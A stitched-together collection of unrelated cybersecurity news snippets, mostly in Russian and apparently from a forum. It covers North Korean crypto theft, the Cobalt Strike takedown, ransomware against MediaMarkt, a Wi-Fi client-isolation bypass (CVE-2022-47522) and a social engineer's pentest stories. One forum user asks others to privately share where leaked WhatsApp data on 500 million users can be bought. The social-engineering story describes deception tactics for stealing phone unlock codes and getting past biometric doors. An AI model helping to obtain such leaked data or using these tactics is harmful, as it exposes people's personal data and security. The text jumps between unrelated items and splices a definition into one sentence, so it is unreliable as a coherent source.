• Source: https://www.breakingnews[.]ie/ireland/gardai-seize-crypto- worth-6-5-million-euro-in-darknet-raid-1659181.html
А за последние 5 лет сумма украденного составила около $1,2 млрд.
По подсчетам Национальной разведывательной службы Южной Кореи (NIS), за последние пять лет северокорейские хакеры похитили виртуальные активы на сумму около 1,2 миллиарда долларов. Более половины от этой суммы ($626 млн) было похищено в этом году.
“Национальная разведывательная служба Южной Кореи заявила, что северокорейские хакеры считаются одними из лучших в области кражи криптоактивов, поскольку Северная Корея вынуждена была сосредоточить все свои силы на киберпреступлениях после ужесточения экономических санкций ООН в 2017 году в ответ на ядерные и ракетные испытания", – сообщает AP.
В NIS добавили, что более 78 млн долларов из общей суммы украденного принадлежит Южной Корее.
ИБ-специалисты считают, что в следующем году кибератак на криптовалютную индустрию станет еще больше, а северокорейские APT-группировки сосредоточатся на краже южнокорейских технологий и конфиденциальной информации о внешней политике и национальной безопасности Южной Кореи.

[ WhatsApp data of 500 million users available for purchase, says
report ](https://indianexpress.com/article/technology/tech-news- technology/massive-whatsapp-data-breach-8293660/)
It is interesting to note that the massive WhatsApp data breach with around 500 million user data doesn't seem to have any Indian user data.
 indianexpress.com
Click to expand...
Has anyone seen where this is for sale or sample? Pls dm with info so we dont openly advertise and break rules
Компании приложат максимум усилий для отключения вредоносной инфраструктуры.
Microsoft, Fortra и Центр обмена и анализа медицинской информации (Health- ISAC) [объявили](https://blogs.microsoft.com/on-the- issues/2023/04/06/stopping-cybercriminals-from-abusing-security-tools/) о широкомасштабном судебном преследовании серверов, на которых размещены взломанные копии Cobalt Strike представляет собой фреймворк для проведения тестов на проникновение, позволяющий доставить на компьютер жертвы полезную нагрузку и управлять ею. Злоумышленники могут использовать Cobalt Strike для развертывания атак с расширенными постоянными угрозами (APT) против вашей организации. Cobalt Strike, одного из основных инструментов киберпреступников.
Постановление суда от 31 марта позволяет Microsoft и Fortra (разработчик Cobalt Strike) конфисковать домены и удалить IP-адреса серверов, на которых размещены взломанные версии Cobalt Strike.
Действия будут происходить с помощью соответствующих групп реагирования на компьютерные чрезвычайные ситуации (CERT) и интернет провайдеров, с конечной целью отключить вредоносную инфраструктуру. Уничтожение инфраструктуры уже началось во вторник, и постановление суда также позволяет коалиции разрушать новую инфраструктуру, которую злоумышленники будут использовать в будущих атаках.
Серверы, на которых размещены взломанные версии Cobalt Strike
«Нарушение работы взломанных устаревших копий Cobalt Strike значительно затруднит монетизацию этих нелегальных копий и замедлит их использование в кибератаках, заставив преступников переоценить и изменить свою тактику», — утверждает Эми Хоган-Берни, глава отдела цифровых преступлений Microsoft (DCU).
По словам Хоган-Берни, в ходе операции также будут поданы иски о нарушении авторских прав в отношении злонамеренного использования программного кода Microsoft и Fortra, которые были изменены и использованы для причинения вреда.
Fortra (ранее известная как Help Systems) выпустила Cobalt Strike в 2012 году как легитимный коммерческий инструмент тестирования на проникновение для красных команд, предоставляя пентестерам возможность сканировать инфраструктуру на наличие уязвимостей.
Хотя разработчик тщательно проверяет клиентов и выдает лицензии только для законного использования, со временем злоумышленники получили и распространили взломанные копии Cobalt Strike, в результате чего Cobalt Strike стал одним из самых используемых инструментов в кибератаках, связанных с кражей данных и программами-вымогателями.
По данным Microsoft, вредоносная инфраструктура, на которой размещается Cobalt Strike, располагается по всему миру, в том числе в Китае, США и России, хотя личность тех, кто стоит за вредоносными кампаниями, остается неизвестной.
Хоган-Берни отмечает, что семейства программ-вымогателей, связанные со взломанными копиями Cobalt Strike, были связаны с более чем 68 атаками программ-вымогателей, затронувшими организации здравоохранения в более 19 странах мира. Атаки стоили больницам миллионы долларов затрат на восстановление и ремонт, а также перерывы в оказании критически важных услуг по уходу за пациентами, включая задержку результатов диагностики, отмену медицинских процедур и задержки в проведении химиотерапии, и это лишь некоторые из многочисленных последствий.
В этом тексте не будет технических подробностей, рассказов про вредоносный или полезный код – мы предупредили. Это почти даже не про компьютеры. И тем очевиднее отличие «отечественное» понимание пентеста от американского: в США все чаще к тестам на проникновение привлекают не хакеров, а социальных инженеров.
Об этом история Дженни Редклифф (Jenny Radcliffe) – девушки без навыков программирования, зато с даром убеждения, который подарил ей славу «взломщицы человеческих голов». Портал Darknet Diares выложил с ней интервью, а мы заинтересовались и делимся с вами переводом.
Сегодня Дженни – востребованный подрядчик крупных ИБ-компаний, которые ищут уязвимости не только в ИТ-инфраструктуре, но и в персонале. Со стороны кажется, что работа социального инженера простая – заговаривать людям зубы. В реальности это рискованная работа, со стороны похожая на грабеж. Поэтому на заре своей карьеры Дженни никому не рассказывала, чем занимается.
Когда я вырасту и стану суперменом
На непростой путь пентеста Дженни толкнул случай в детстве: когда ей было 10, она забралась в дом к соседу, а тот ее запер. Девочка твердо решила, что если ей удастся выбраться из этой передряги, то она – настоящий супергерой и будет заниматься в жизни чем-то супергеройским.
Взрослея, Дженни «прокачивала» навыки проникновения в здания под руководством своих хулиганистых кузенов. В подростковом возрасте она научилась быстро вскрывать замки и обходить сигнализации. А потом выяснилось, что на этих талантах можно и заработать. Когда Дженни училась в колледже, кузены предложили ей заняться «легальным взломом». Они уже работали в сфере и тестировали на безопасность дома богачей: пытались проникнуть внутрь и, если им это удавалось, выдавали вердикт: как им удалось справиться с охранными системами. Некоторые клиенты предлагали протестировать аналогичным образом не только жилые дома, но и офисы.
Первое самостоятельное задание
Один из заказчиков обратился напрямую к Дженни и предложил провести аудит безопасности представительства лейбористской партии в Ливерпуле. Чтобы доказать незащищенность помещения и уязвимость персонала, ей как тестеру требовалось выкрасть адресную книгу со стола партийного руководителя.
Офис занимал оупен-спейс на восьмом этаже, охранники защищали вход только на первый этаж, сам босс восседал за столом в дальнем конце помещения. Задача была в том, чтобы обойти секьюрити внизу и пробраться к рабочему месту руководителя, когда в офисе никого не будет. В свой первый визит Дженни наплела сотрудникам офиса, будто жаждет попасть на прием к руководству партии. Ей рассказали, что на следующий день запланирована выездная конференция, поэтому все очень заняты. Так Дженни выяснила, что в партийном офисе не будет не только босса, но и никого другого. Нужно ли говорить, что «проникновение» прошло успешно: назавтра Дженни спокойно прошлась по пустующему офису и забрала нужную книгу.
Галантность до добра не доведет
Другое задание Дженни было связано с проверкой защищенности личной почты владельца крупного бизнеса. Она начала, как и положено, со сбора данных. Как правило, много полезного удается почерпнуть из соцсетей. Но не в этот раз. У бизнесмена не было аккаунта в Facebook, он не писал в Twitter, не постил фотки в Instagram. Он также не строил карьеру через Linkedin и не завел себе страничку на Reddit. На сайте Pinterest нашелся аккаунт его секретаря. Но весь компромат на нее заключался в том, что она вязала милые поделки.
Дженни продолжила изучать информацию в СМИ, где обнаружила, что бизнесмен и его жена основали организацию, которая проводила благотворительные обеды. Девушка поняла, что это шанс, и купила билет на ближайшее мероприятие, которое пара устраивала в Лондоне. Целью было знакомство с бизнесменом, обмен телефонами и, если повезет, возможность подсмотреть код разблокировки гаджета.
Чтобы ситуация выглядела максимально естественной, подобраться к бизнесмену девушка планировала, предварительно познакомившись с его женой. Той она представилась журналисткой и сказала, что готовит статью про благотворительность. Взяв у семейной пары небольшое интервью, Дженни отправила свои контакты и пообещала прислать ссылку на публикацию. Дождавшись, когда бизнесмен будет открывать только что полученное сообщение на своем телефоне, сообщник Дженни незаметно снял процесс разблокировки в замедленном режиме. На видео без проблем можно было распознать код, так что «коллега» подал фальшивой репортерше сигнал об успешном завершении этапа операции.
Следующий шаг можно сравнить с методами, которые применяют телефонные мошенники: они подталкивают жертву к активным действиям, загоняя в цейтнот. Дженни связалась с благотворителями и сказала, что короткой беседы оказалось недостаточно, поскольку редакция хочет вынести материал на обложку. Для развернутого и красивого текста нужны фотографии и подробности. И все это срочно до пятницы. С бизнесменом договорились о встрече в офисе.
На встрече цель Дженни была простой – получить доступ к компьютеру и телефону. Когда бизнесмен предложил даме кофе и поднялся с кресла, чтобы, в знак симпатии, налить его самостоятельно, «журналистка» посетовала, что пьет только без кофеина. Бизнесмен как гостеприимный хозяин не смог отказать и отправился на поиски напитка, который Дженни, откровенно говоря, ненавидела. Когда жертва вышла за дверь, Дженни разблокировала оставленный на столе телефон и отправила с него сообщение службе безопасности, а затем продублировала его с корпоративного компьютера. Дело было сделано. Служба безопасности получила доказательства того, что отказ топ-менеджера от соцсетей – не панацея от компрометации и утечки данных.
Биометрию обвели вокруг пальца
Компания, проводившая пентест банка, привлекла Дженни для проверки эффективности работы системы биометрической идентификации. Задача состояла в том, чтобы проникнуть за охраняемый периметр и вставить флешку со специальным ПО в один из корпоративных компьютеров.
Традиционный вариант с пожарной тревогой и эвакуацией персонала из здания Дженни отмела. Понаблюдав за тем, как выглядят и ведут себя сотрудники, проходящие за дверь, снабженную сканером отпечатка пальца, девушка подобрала более подходящий план действий. Она оделась в соответствии с дресс-кодом, но загипсовала себе руку. При этом у нее все же оставалась возможность прикоснуться «больной» рукой к сканеру.
Неуклюже прикладывая палец к сканеру, Дженни сетовала на то, что «тупой замок опять не работает». Наблюдавший за этим охранник попытался помочь и со словами «а вы поплотнее прижать попробуйте» поднажал на больную руку. Это не помогло, а Дженни сделала вид, что от еще одной подобной попытки она потеряет сознание от боли. Сердобольный секьюрити вошел в положение и открыл «сотруднице» дверь своим отпечатком. Так Дженни выполнила свою задачу, а банк провалил пентест.
В гостях у мафии
В проектах по тестированию безопасности организаций для социального инженера самое важное – быть уверенным в собственной защищенности. Поэтому проверять, насколько «чист» заказчик и легитимно задание, необходимо до начала работы.
Дженни поделилась негативным опытом – историей, когда она доверилась старому партнеру и взялась за работу, не проверив все тонкости. Ей предложили «по- быстрому» протестировать защищенность очередного особняка. Задание было срочным и, как ей казалось, вполне рутинным. Девушка приступила к нему, не заручившись документальным подтверждением, в том числе от полиции, что тест законен. Заказчик на словах заверил, что все оформлено как обычно и проблем не возникнет.
Дженни легко проникла в дом и оставила записку с кодовой фразой. Она была угрожающей, но как ей пояснил заказчик, текст сообщал владельцу о том, что тест на безопасность провален. Пентестерша уже выбралась наружу, когда к особняку подъехала охрана, вооруженная до зубов и по виду больше похожая на мафию. Покинуть территорию сада девушка не успела. Обнаружив записку, охранники стали обыскивать территорию, но чудом не нашли пентестершу. Она пролежала на земле несколько часов и только под утро смогла покинуть место «задания». Дженни было очевидно, что ее подставили.
Золотой ключик
К счастью, работа социнженера не ограничивается участием в рискованных пентестах. Крупные корпорации регулярно привлекают такого рода специалистов для участия в переговорах. Тогда задача Дженни – найти «ключик» к потенциальному партнеру своего заказчика. Критерий успешности сделки не прибыль, а количество информации, которую удастся собрать. В перспективе информация об увлечениях, фобиях, идеях-фикс партнера очень пригодится.
Дженни также привлекают, чтобы научиться распознавать уловки социнженеров или самим их использовать. Она создала курс, где рассказывает про 19 «крючков», за которые можно «дергать» жертву и заставлять ее поступать по-твоему. Это востребованная услуга, но Дженни предупреждает, что освоить такие навыки непросто и не всегда приятно.
Чтобы манипулировать людьми, приходится использовать «страхи, которые будят их по ночам». Влезать на эту темную сторону бывает тяжело. В то же время важно знать, что мотивирует, вдохновляет и по-настоящему заботит человека. Шаг за шагом комбинируя эти знания, получается «хакнуть» человека. Ключик к каждому свой, но мало его найти – общение с жертвой напоминает шахматную партию, в которой всегда есть риски проиграть.
Поэтому, обучая клиентов своему мастерству, девушка предупреждает: не заигрывайтесь. Не стоит использовать нечестные психологические уловки просто ради прихоти. А вот в общении с людьми, которые потенциально могут причинить вред, полезно знать об уловках и как они работают, чтобы не поддаваться на манипуляции.
• Source: https://habr.com/ru/company/searchinform/blog/571024/
ФСБ возбудила дело по статье «Госизмена» на 18-летнего студента-программиста из Томска.
По данным источника, парень действовал по заданию украинских спецслужб. Молодой человек совершил серию компьютерных атак на информационные ресурсы администрации города и Томского политехнического университета.
Атаки хакер совершал из своей квартиры в январе и марте прошлого года.
Уголовное дело на студента завели 26 октября.
Компания Microsoft [объявила](https://techcommunity.microsoft.com/t5/windows- it-pro-blog/vbscript-deprecation-timelines-and-next-steps/ba-p/4148301), что во второй половине 2024 года начнет сокращать использование VBScript, сначала сделав его on-demand функцией, а затем удалив окончательно.
Функции по требованию или on-demand представляют собой дополнительные функции в Windows (например, .NET Framework, Hyper-V, Windows Subsystem for Linux), которые не устанавливаются по умолчанию, но при необходимости могут быть добавлены отдельно.
«С годами технологии развиваются, и появляются более мощные и универсальные скриптовые языки, такие как JavaScript и PowerShell. Эти языки обладают более широкими возможностями и лучше подходят для современной веб-разработки и задач автоматизации, — сообщают представители Microsoft. — Начиная с нового релиза ОС, который запланирован на вторую половину текущего года, VBScript будет доступен в качестве on-demand функции. Затем функция будет полностью исключена из будущих выпусков ОС Windows, поскольку мы переходим к более эффективному использованию PowerShell».
Click to expand...
В настоящее время план Microsoft по отказу от использования VBScript состоит из трех этапов. Первый этап начнется во второй половине 2024 года, когда VBScript станет on-demand функцией по умолчанию в Windows 11 24H2.
На втором этапе, который стартует примерно в 2027 году, VBScript по-прежнему будет доступен в качестве функции по требованию, но больше не будет предустанавливаться.
После этого, на третьем этапе, VBScript будет окончательно исключен из будущих
версий Windows. В результате все библиотеки VBScript (файлы .dll) будут
удалены, а проекты, использующие VBScript, перестанут функционировать.

Напомним, что в октябре прошлого года компания впервые объявила о том, что
после 30 лет существования в качестве системного компонента VBScript (он же
Visual Basic Script или Microsoft Visual Basic Scripting Edition) будет
упразднен в Windows.
VBScript поставляется в комплекте с Internet Explorer (IE 11 отключен в некоторых версиях Windows 10 в феврале 2023 года) и помогает автоматизировать задачи и управлять приложениями с помощью Windows Script. Отметим, что Microsoft уже отключила VBScript по умолчанию в Internet Explorer 11 для Windows 7, 8 и 8.1 в рамках накопительного обновления летом 2019 года.
Хотя в компании предпочитают не упоминать об этом, отказ от VBScript связан еще и с тем, что это один из популярных векторов доставки малвари в системы пользователей. К примеру, ранее с его помощью распространялись такие вредоносы как Lokibot, Emotet, Qbot, DarkGate и так далее.
Протокол децентрализованных финансов Platypus на основе блокчейна Avalanche подвергся атаке, в ходе которой хакеру удалось украсть криптоактивы на сумму около $8.5 млн.
Платформа Platypus сообщила, что злоумышленник взял мгновенный кредит, использовав логическую ошибку в механизме проверки платежеспособности в контракте залога. Неизвестный смог вывести активы из основного пула. В результате действий хакера стейблкоин Platypus USD потерял привязку к доллару США, обвалившись на 52.2%, до $0.47.
Dear Community, We regret to inform you that our protocol was hacked recently, and the attacker took advantage of a flaw in our USP solvency check mechanism. They used a flashloan to exploit a logic error in the USP solvency check mechanism in the contract holding the collateral. — Platypus (@Platypusdefi) [URL="https://twitter.com/Platypusdefi/status/1626396538611310592?ref_src=twsrc%5Etfw"February 17, 2023][/URL]
Click to expand...
Platypus приостановила все операции на платформе. На данный момент средства, находящиеся в основном пуле Platypus, покрывают лишь 35% пользовательских депозитов. Средства в другом пуле не затронуты. Команда Platypus ведет переговоры с хакером о возврате средств в обмен на вознаграждение. Представители платформы также обратились к компаниям Binance, Tether и Circle с просьбой заморозить украденные средства, чтобы предотвратить дальнейшие потери.
По данным DefiLlama, в марте прошлого года объем средств, заблокированных в протоколе Platypus, достиг рекордного уровня в $1.25 млрд. Теперь этот показатель насчитывает около $40.7 млн.
Это уже не первый случай, когда хакеры применяют атаки с использованием мгновенных займов. Прошлой осенью подобным махинациям подвергся DeFi-протокол New Free DAO, работающий на основе Binance Smart Chain. Его токен NFD обвалился на 99%..
С помощью IceXLoader злоумышленники заражают жертв Dark Crystal RAT и криптомайнерами.
Новую версию IceXLoader обнаружили исследователи из Minerva Labs. По их
словам, версия вредоноса, обнаруженная в июне (v3.0) выглядела незавершенной,
но последняя находка (v3.3.3) является полностью работоспособной.
IceXLoader – это вредонос, который продается на дарквеб-маркетплейсах за $118.
Чаще всего он используется для доставки и запуска дополнительных вредоносных
программ на взломанных узлах.
Обычно IceXLoader распространяется с помощью фишинговых писем, в которых
содержатся ZIP-архивы, являющиеся триггером для развертывания вредоноса.
Злоумышленники используют его для того, чтобы заразить жертв DarkCrystal RAT и
криптомайнерами.
Обычно атака проходит по такому сценарию:
Как и более старая версия, IceXLoader 3.3.3 написан на языке Nim. Вредонос
умеет собирать системные метаданные и отправлять их на контролируемый
злоумышленниками домен. Дроппер можно контролировать командами с сервера:
перезапустить, удалить или остановить. Но главная его фишка – возможность
загрузки и выполнения вредоносных программ на диске или без файлов в памяти.
Специалисты Minerva Labs отметили, что база данных злоумышленников постоянно
пополняется информацией о тысячах новых жертв. Сейчас компания активно
рассылает уведомления о произошедшем всем пострадавшим компаниям.
В Главном управлении МВД по Свердловской области начал функционировать отдел по борьбе с киберпреступлениями, возглавляемый полковником Евгением Полупановым. Об этом сообщил начальник пресс-службы ведомства Валерий Горелых, передает URA.RU.
«В структуре полиции Свердловского гарнизона появилось новое подразделение, которое успешно начало свою работу, занимаясь борьбой с киберпреступлениями»,
Полковник Евгений Полупанов стал руководителем нового подразделения. Он координирует работу всех подразделений, занимающихся расследованием обмана свердловчан мошенниками, использующими новые технологии.
source: ura.news/news/1052649931
Как сообщают Wu_Blockchain и представители китайского #DeFi сообщества, в результате крупнейшего хака было выведено $335M с кросс-чейн аггрегатора на следующие адреса:
BSC: $251M

The Address 0x0d6e286a7cfd25e0c01fee9756765d8033b32c71 page allows users to view transactions, balances, token holdings and transfers of both BEP-20 and ERC-721 (NFT) tokens, and analytics.
bscscan.com
Polygon: $85M

The Address 0x5dc3603c9d42ff184153a8a9094a73d461663214 page allows users to view transactions, balances, token holdings and transfers of both ERC-20 and ERC-721 (NFT) tokens, and analytics.
polygonscan.com
Еще $274М находятся на адресе в сети ETH:

The Address 0xC8a65Fadf0e0dDAf421F28FEAb69Bf6E2E589963 page allows users to view transactions, balances, token holdings and transfers of ERC-20, ERC-721 and ERC-1155 (NFT) tokens, and analytics.
etherscan.io
пруф:
Санкционированные обыски у черниговок 1988 и 1993 годов рождения состоялись в рамках уголовного производства, открытого следователями полиции Чернигова по признакам части 3 статьи 190 Уголовного кодекса Украины (мошенничество, совершенное в крупных размерах, или путем незаконных операций с использованием электронно-вычислительной техники).
Полицейские установили, что эти молодые женщины начали преступную деятельность не позднее мая прошлого года. Они размещали на различных площадках во всемирной сети Интернет ложные объявления о продаже предметов одежды. Злоумышленницы принимали предоплату за вымышленный товар на карточные банковские счета, после чего прерывали связь с обманутыми клиентами.
В ходе санкционированных обысков по местам проживания фигуранток производства правоохранители изъяли ряд вещественных доказательств мошеннической деятельности. В частности, изъята компьютерная и оргтехника, три десятка банковских карт, выпущенных различными банками, стос блокнотов с черновыми записями и подсчетами, мобильные телефоны и десятки сим-карт различных операторов связи.
Сейчас полицейским Черниговщины однозначно известно о 29 мошенничествах, в которых подозреваются разоблаченные злоумышленницы. Обманутые граждане проживают в разных областях Украины: от Львовской и Ровенской - до Запорожской и Днепропетровской. Количество и география доказанных преступлений будет шириться и в дальнейшем, ведь продолжается следственная и розыскная работа полиции по установлению полного перечня потерпевших и суммы нанесенного ущерба.
на фотках и в видео баб не показали
Как сообщает TheRecord, авиация Израиля разбомбила два объекта на территории сектора Газа, которые использовались ХАМАС для проведения киберопераций.
Об этом израильские ВВС официально заявили в Twitter. Первый объект являлся ЦОДом, а второй - "квартирой-убежищем, которая использовалась террористами для наступательных киберопераций против израильских целей".
Особый цинизм действиям разнузданной израильской военщины придает фраза "Атакованная квартира была размещена рядом с детским садом, что еще раз доказывает, что ХАМАС намеренно подвергает опасности мирных жителей размещая свою военную инфраструктуру в гражданских районах".
Теперь как, можно по NSO Group, которая весь мир ломает, не стесняясь Калибрами заряжать? И может ли Иран с полным осознанием свое правоты разбомбить Подразделение 8200 Управления военной разведки Армии обороны Израиля в качестве ответа на совершенную в мае 2020 года евреями кибератаку на информационные ресурсы иранского портового города Бендер-Аббас, которую бывший глава военной разведки Израиля генерал Амос Ядлин назвал "четким посланием Ирану в ответ на кибератаки на водные ресурсы Израиля" (в чем Иран, кстати, никогда не признавался).
Это не первая физическая атака в качестве ответа на кибероперации. Первую тоже осуществил Израиль в 2019 году, когда взорвал здание, в котором размещалось киберподразделение ХАМАС.
Центр правовой помощи помог восстановить справедливость.
Злоумышленники взломали личный кабинет в онлайн-сервисе, похитили персональные данные и оформили 17 кредитов на жителя города Екатеринбурга. Он узнал о своих несуществующих долгах из SMS-сообщения от кредитно-финансовой организации.
По данным ведомства, со своей проблемой пострадавший обратился в Центр правовой помощи гражданам в цифровой среде ФГУП «ГРЧЦ», созданный по инициативе Роскомнадзора в 2021 году. Юристы Центра подготовили претензии с требованием аннулировать спорные договоры, часть из которых удовлетворили в досудебном порядке, по оставшимся восьми составили исковые заявления.
В начале марта суд признал недействительным последний договор займа, постановил компенсировать моральный вред и удалить информацию о долгах из кредитной истории гражданина.
Эксперты Центра также пресекли попытки взыскания задолженности через судебные приказы в период обжалования договоров. Кроме того, удалось добиться возбуждения уголовного дела в отношении злоумышленников. Сейчас они находятся в розыске.
source: t.me/rkn_tg/461
President Obama, regarding sanctions issued in response to cyberattacks.
President Joe Biden this week has extended [Executive Order 13694](https://obamawhitehouse.archives.gov/the-press- office/2015/04/01/executive-order-blocking-property-certain-persons-engaging- significant-m) regarding sanctions issued in response to cyberattacks.
Executive Order 13694 was issued by President Barack Obama in 2015, it allows the government to block the property of certain persons engaging in significant malicious cyber-enabled activities.
US President Trump extents the same Executive Order in 2017, and later in 2018, 2019 and 2020.
On Monday, President Joe Biden sent a letter to the House of Representatives and the Senate, which proposes the same text of the letters sent by Trump during its administration.
“Significant malicious cyber-enabled activities originating from, or directed by persons located, in whole or in substantial part, outside the United States continue to pose an unusual and extraordinary threat to the national security, foreign policy, and economy of the United States. Therefore, I have determined that it is necessary to continue the national emergency declared in Executive Order 13694 with respect to significant malicious cyber-enabled activities,”[reads President Biden’s letter.](https://www.whitehouse.gov/briefing-room/statements- releases/2021/03/29/letter-to-the-speaker-of-the-house-and-the-president-of- the-senate-on-the-continuation-of-the-national-emergency-with-respect-to- significant-malicious-cyber-enabled-activities/)
The letter states that the national emergency declared in Executive Order of April 1, 2015, with respect to significant malicious cyber enabled activities will be in effect beyond April 1, 2021.
За восстановление зашифрованных файлов вымогатели потребовали от MediaMarkt $240 млн.
Крупная сеть магазинов электроники и бытовой техники MediaMarkt подверглась кибератаке с использованием вымогательского ПО Hive, в результате которой ее IT-системы были отключены, и магазины в Германии и Нидерландах не могли работать в обычном режиме. За восстановление зашифрованных файлов вымогатели потребовали от MediaMarkt $240 млн.
MediaMarkt является крупнейшим в Европе продавцом потребительской электроники
Злоумышленники атаковали компанию с вечера воскресенья, 7 ноября, до утра понедельника, 8 ноября. Вымогательское ПО Hive зашифровало ее серверы и рабочие станции, и в целях предотвращения распространения атаки MediaMarkt пришлось отключить свои IT-системы.
Атака затронула целый ряд розничных магазинов в Европе, преимущественно в Нидерландах. Хотя с online-продажами не было никаких проблем, кассовые аппараты не могли принимать кредитные карты и печатать чеки. Кроме того, не работал возврат товаров из-за невозможности просмотреть предыдущие покупки.
Как сообщили местные СМИ, администрация MediaMarkt дала указания сотрудникам избегать зашифрованных систем и отключить кассовые аппараты от сети.
Согласно опубликованному в Twitter скриншоту , атака затронула 3,1 тыс. серверов. Были ли похищены хранящиеся на них данные, неизвестно, однако операторы Hive, как правило, похищают файлы у своих жертв и в случае неуплаты публикуют их на своем сайте утечек HiveLeaks.
Hive - сравнительно новая кибервымогательская операция ("партнерская программа"), начавшаяся в июне 2021 года. Вымогательское ПО распространяется через вредоносные фишинговые письма. Отличительной чертой Hive является удаление резервных копий файлов, чтобы лишить жертв возможности восстановить данные без уплаты выкупа.
В отличие от других "партнерских программ" Hive не брезгует атаковать медучреждения, дома престарелых, правительственные организации и пр.
Подробнее: https://www.securitylab.ru/news/526338.php
29 августа, основатель и глава Telegram Павел Дуров рассказал у себя в Telegram-канале, что мессенджер начал поддерживать ссылки второго типа. Теперь имя пользователя, написанное латиницей, можно будет увидеть и перед адресом страницы, а не только после него.
По словам Дурова, к основным и привычным ссылкам типа t.me/username добавятся новые — username.t.me. Сделано это в преддверии создания на базе мессенджера платформы по продаже запоминающихся никнеймов через аукционы.
«В преддверии грядущих событий, сегодня мы добавляем поддержку ссылок типа username.t.me для каждого имени пользователя в Telegram, в дополнение к уже существующим t.me/username. Эти ссылки уже функционируют в любом браузере», — сообщил Павел Дуров.Источник: ferra.ru
Click to expand...
Весьма интересно, почему команда Telegram решилась на такой шаг.
Каждый из нас, хотя бы раз, из-за любопытности, проверял, либо делился своим именем пользователя, каналом на t.me. Это обычный интерактивный редирект на основную страницу для приложения Telegram.
Раньше при входе на такую ссылку, никто не мог догадаться, какое имя
пользователя вы посещаете, ссылка была спрятана внутри трафика TLS 1.2.
Всё было анонимно, и многие пользователи делились своими ссылками на порталах
раскрытия личных данных, на форуме оппозиции Путина, на форме заявки и т.д.
Теперь же при входе на vova.t.me в расширении TLS Server_Name_Indication высвечивается ваше имя пользователя vova.
Посмотрим в WireShark:
Если вы хоть раз проходили по своей ссылке без VPN, то вы официально выдали свой IP адрес правоохранительным органам.
Согласно закону Яровой, оператор связи должен хранить интернет-трафик в течение 30 дней. Но через 30 дней ситуация не улучшится, мы знаем, что правительство очень дорожит такой чувствительной информацией.
Что же делать?
Просто никогда не пользоваться такими стандартами ссылок нигде, даже не кликать по незнакомым.
Мэти Ванхоф (Mathy Vanhoef), автор атаки KRACK на беспроводные сети, в своё время выявивший 12 уязвимостей в стандартах IEEE 802.11, раскрыл сведения о новой уязвимости ([CVE-2022-47522](https://security- tracker.debian.org/tracker/CVE-2022-47522)) в технологии буферизации пакетов Wi-Fi, затрагивающей различные устройства (Cisco, Ubiquiti) и операционные системы (Linux, FreeBSD, iOS, Android). Дополнительно открыт доступ к инструментарию MacStealer для совершения атаки. Уязвимость позволяет обойти шифрование в беспроводной сети и может быть использована для перехвата трафика изолированных клиентов.
Уязвимость затрагивает механизм формирования очередей для буферизации кадров перед отправкой получателям, а также недоработки в управлении контекстом защиты для помещённых в очередь кадров. В качестве причины появления уязвимости называется отсутствие в стандарте 802.11 явных предписаний по управлению контекстом защиты для буферизированных кадров и отсутствие защиты для флага power-save в заголовке кадра, при помощи которого атакующий может манипулировать помещением кадров в очередь.
Через манипуляцию кадрами для получателей, находящихся в спящем режиме (выставление флага power-save в заголовке), атакующий может добиться их буферизации и изменения контекста защиты, что приведёт к отправке кадров из очереди без применения шифрования или с шифрованием нулевым ключом. Отдельно предложена техника перенаправления находящихся в очереди кадров из точки доступа на подконтрольное атакующему устройство.
Возможность перенаправления кадров из очереди вызвана тем, что в беспроводном стеке аутентификация клиента и маршрутизация пакетов отделены друг от друга (при маршрутизации используются только MAC-адреса). Для перенаправления кадров на устройство атакующего используется трюк, связанный с периодическим отключением жертвы после отправки им запроса, и подключением устройства атакующего с MAC-адресом жертвы (пакеты, которые были адресованы жертве и застряли в очереди будут отправлены на устройство атакующего).
Атака может быть применена для перехвата трафика других пользователей в обход изоляции клиентов на уровне MAC, даже если клиентам запрещено взаимодействовать друг с другом. Для успешного совершения атаки злоумышленник должен иметь доступ к сети Wi-Fi, что на практике ограничивает уязвимость использованием для обхода изоляции клиентов на точке доступа (режим "AP isolation") или обхода режима динамического инспектирования ARP (DAI, Dynamic ARP Inspection).
Например, уязвимость может применяться для атаки на пользователей корпоративных сетей, в которых пользователи отделены друг от друга или в которых используются протоколы WPA2 и WPA3 в режиме изоляции клиентов (выставляются отдельные SSID для гостевых систем или задаются разные пароли (Multi-PSK)), а также для атаки на публичные точки доступа, защищённые при помощи технологии Passpoint (Hotspot 2.0) или использующие WPA3 SAE-PK. При этом атака не может применяться для устройств, разделённых при помощи VLAN (не получится атаковать устройство в другом VLAN).
22-летний рэпер Девон Тернер, известный под ником Punchmade Dev, подал в суд на PNC Bank, заблокировавший перевод американца на 75 тысяч долларов. Как уточняет независимый журналист Брайан Кребс, в дальнейшем счет был закрыт из- за «подозрительных действий».
«Истец — очень успешный владелец бизнеса, афроамериканец, заработавший миллионы долларов на своем бизнесе и нанявший на работу более 30 человек», — написал Тернер в исковом заявлении, добавив, что сотрудники банка позволяли себе уничижительные замечания в его адрес и намекали на то, что для такого человека, как он, было бы необычно иметь такие деньги.
Еще в начале 2024 года Кребсу удалось установить, что Тернер владеет компанией OBN Group LLC, зарегистрированной в штате Кентукки. Однако на самом деле исполнитель, рассказывающий в своих треках о быте и сложностях жизни кардера, мог привлечь внимание правоохранительных органов, о чем ему сообщили банковские сотрудники. В описании его популярного профиля в Instagram (860 тысяч подписчиков) содержится ссылка на площадку punchmade[.]cc, торгующей взломанными банковскими счетами и платежными картами с большим балансом.
«Так кто же такой на самом деле Punchmade Dev? Крупный игрок и пособник киберпреступников? Или он какой-то никчемный кретин, который потратил кучу денег на индивидуальные медальоны, но при этом не может позволить себе адвоката? Трудно сказать», — задается вопросом Кребс.
МОСКВА, 23 ноя - РИА Новости. Основатель Group- IB Илья Сачков, которому сегодня продлили арест до конца февраля по делу о госизмене, обратился к президенту России Владимиру Путину с просьбой посодействовать его переводу под домашний арест, передает корреспондент РИА Новости от Лефортовского суда Москвы.
"Я считаю, что это новое дело Дрейфуса. Я не изменник, не шпион и не
предатель, я русский инженер. Своей работой неоднократно доказал пользу и
преданность своей родине. Я очень прошу моего президента Владимира
Владимировича Путина позволить мне на время следствия находиться под домашним
арестом с максимальными ограничениями", - зачитал адвокат Сергей Афанасьев
письмо Сачкова.
Адвокат добавил, что Сачков чувствует себя хорошо, ему начали поступать
письма, он на них отвечает. "Можете передать, что он с радостью ответит на все
письма, только не сможет обсуждать уголовное дело… Он дает показания
следствию, ничего не скрывает", - заключил Афанасьев.
Материалы дела, как и в подавляющем большинстве расследований, связанных с
госизменой, засекречены. Сачкову грозит наказание в виде лишения свободы от 12
до 20 лет. Он был арестован в конце сентября.
По словам другого адвоката бизнесмена Дмитрия Дихтяря, вину Сачков не
признает, а уголовное дело не связано с деятельностью основанной им компании.
